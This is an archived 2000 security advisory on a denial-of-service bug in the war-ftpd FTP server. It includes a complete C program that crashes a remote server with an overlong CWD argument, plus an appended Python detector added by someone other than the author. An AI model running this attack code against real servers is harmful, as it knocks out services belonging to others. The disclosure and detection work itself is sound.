war-ftpd 1.6x DoS

From: Toshimi Makino (crcat_private)
Date: Mon Jan 31 2000 - 23:58:46 PST


    Hello,
    
    
    "war-ftpd" is a very popular ftp server for Windows95/98/NT.
    I recently found a DoS problem in "war-ftpd 1.6x".
    
    
    Outline:
      It seems to occur because the bounds check on the argument of the
      MKD/CWD commands that this problem uses to control the directory
      is imperfect.
    
      However, I could not hijack control of EIP, as far as I tested.
      This is because the RET address cannot be overwritten, since the
      total buffer capacity seems to be checked properly
      in 1.66x4 and later.
    
      The boundary of the Access Violation lies somewhere between about
      533 bytes and 8182 bytes, although it differs by the thread
      that receives the attack.
    
    
    The versions in which this vulnerability is confirmed are as follows:
      1.66x4s, 1.67-3
    
    
    The version in which this vulnerability was not found is as follows:
      1.71-0
    
    
    Test Environments:
      Microsoft WindowsNT 4.0 Workstation SP6a Japanese version+IE4.0SP2
      Microsoft WindowsNT 4.0 Workstation SP5 Japanese version+IE4.0SP2
      Microsoft WindowsNT 4.0 Server SP4 Japanese version
    
    
    Solution:
      1.70-1 should be used to solve this problem fundamentally.
      Because it becomes "Access denied" in 1.71-0, the DoS did not occur.
    
    
    ---
    warftpd-dos.c
    
    I coded a program to reproduce this problem.
    It applies a DoS attack to a remote "war-ftpd" server.
    
    
    /*--------------------------------------------------------------*/
    /* war-ftpd 1.66x4s and 1.67-3 DoS sample by crc "warftpd-dos.c"*/
    /*--------------------------------------------------------------*/
    
    #include    <stdio.h>
    #include    <stdlib.h>     /* exit(), atexit() */
    #include    <string.h>
    #include    <winsock.h>
    #include    <windows.h>
    
    #define     FTP_PORT        21
    #define     MAXBUF          8182
    //#define     MAXBUF          553
    #define     MAXPACKETBUF    32000
    #define     NOP             0x90
    
    int main(int argc,char *argv[])
    {
        SOCKET               sock;
        unsigned long        victimaddr;
        SOCKADDR_IN          victimsockaddr;
        WORD                 wVersionRequested;
        int                  nErrorStatus;
        static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF];
        struct hostent       *victimhostent;
        WSADATA              wsa;
    
        /* argv[3] (the password) is used below, so four arguments are required */
        if (argc < 4){
            printf("Usage: %s TargetHost UserName Password\n",argv[0]); exit(1);
        }
    
        wVersionRequested = MAKEWORD(1, 1);
        nErrorStatus = WSAStartup(wVersionRequested, &wsa);
        if (atexit((void (*)(void))(WSACleanup))) {
            fprintf(stderr,"atexit(WSACleanup)failed\n"); exit(-1);
        }
    
        if ( nErrorStatus != 0 ) {
            fprintf(stderr,"Winsock Initialization failed\n"); exit(-1);
        }
    
        if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
            fprintf(stderr,"Can't create socket.\n"); exit(-1);
        }
    
    
        victimaddr = inet_addr(argv[1]);
        if (victimaddr == INADDR_NONE) {   /* not a dotted quad: resolve the name */
            victimhostent = gethostbyname(argv[1]);
            if (victimhostent == NULL) {
                fprintf(stderr,"Can't resolve specified host.\n"); exit(-1);
            }
            else
                victimaddr = *((unsigned long *)((victimhostent->h_addr_list)[0]));
        }
    
        victimsockaddr.sin_family        = AF_INET;
        victimsockaddr.sin_addr.s_addr  = victimaddr;
        victimsockaddr.sin_port  = htons((unsigned short)FTP_PORT);
        memset(victimsockaddr.sin_zero,(int)0,sizeof(victimsockaddr.sin_zero));
    
        if(connect(sock,(struct sockaddr *)&victimsockaddr,sizeof(victimsockaddr)) == SOCKET_ERROR){
            fprintf(stderr,"Connection refused.\n"); exit(-1);
        }
    
        printf("Attacking war-ftpd ...\n");
        recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
        sprintf((char *)packetbuf,"USER %s\r\n",argv[2]);
        send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
        recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
        sprintf((char *)packetbuf,"PASS %s\r\n",argv[3]);
        send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
        recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
    
        memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;
    
        sprintf((char *)packetbuf,"CWD %s\r\n",buf);
        send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
    
        Sleep(100);
        shutdown(sock, 2);
        closesocket(sock);
        WSACleanup();
        printf("done.\n");
        return 0;
    }
    
    ----
           Toshimi Makino   E-mail:crcat_private
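A defensive check, added here and not part of the original post: it scans FTP control-channel lines for CWD/MKD commands whose argument length reaches the 533-byte lower bound the post reports, and notes when the argument is padding of one repeated byte. The threshold names and the sample session are constructed for illustration.

```python
"""Flag overlong FTP CWD/MKD arguments of the kind described in the post."""
from collections import Counter

# Shortest argument the post reports as triggering an access violation;
# 8182 bytes is the upper end of the range it gives.
MIN_CRASH_LEN = 533


def parse_command(line: bytes):
    """Split one FTP control-channel line into (VERB, argument bytes)."""
    line = line.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    if not verb.isalpha():          # not an FTP verb (empty line, binary noise, ...)
        return None
    return verb.upper(), arg


def is_filler(arg: bytes, min_run: int = 64) -> bool:
    """True if the argument is dominated by a single repeated byte (e.g. 0x90 padding)."""
    if not arg:
        return False
    top_count = Counter(arg).most_common(1)[0][1]
    return top_count >= max(min_run, int(0.9 * len(arg)))


def inspect_session(lines, threshold: int = MIN_CRASH_LEN):
    """Return one alert per CWD/MKD command whose argument is at least `threshold` bytes."""
    alerts = []
    for idx, line in enumerate(lines):
        parsed = parse_command(line)
        if parsed is None:
            continue
        cmd, arg = parsed
        if cmd in (b"CWD", b"MKD") and len(arg) >= threshold:
            alerts.append({"line": idx, "cmd": cmd.decode(), "arg_len": len(arg),
                           "filler": is_filler(arg)})
    return alerts


# Constructed sample session: a normal login, the 8181 x 0x90 CWD the post's
# program sends (MAXBUF-1 bytes), and a shorter MKD that still exceeds 533 bytes.
SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"PASS guest@example.invalid\r\n",
    b"CWD /pub\r\n",
    b"CWD " + b"\x90" * 8181 + b"\r\n",
    b"MKD " + b"A" * 600 + b"\r\n",
    b"QUIT\r\n",
]

if __name__ == "__main__":
    for alert in inspect_session(SAMPLE_SESSION):
        print(alert)
```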
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:32:57 PDT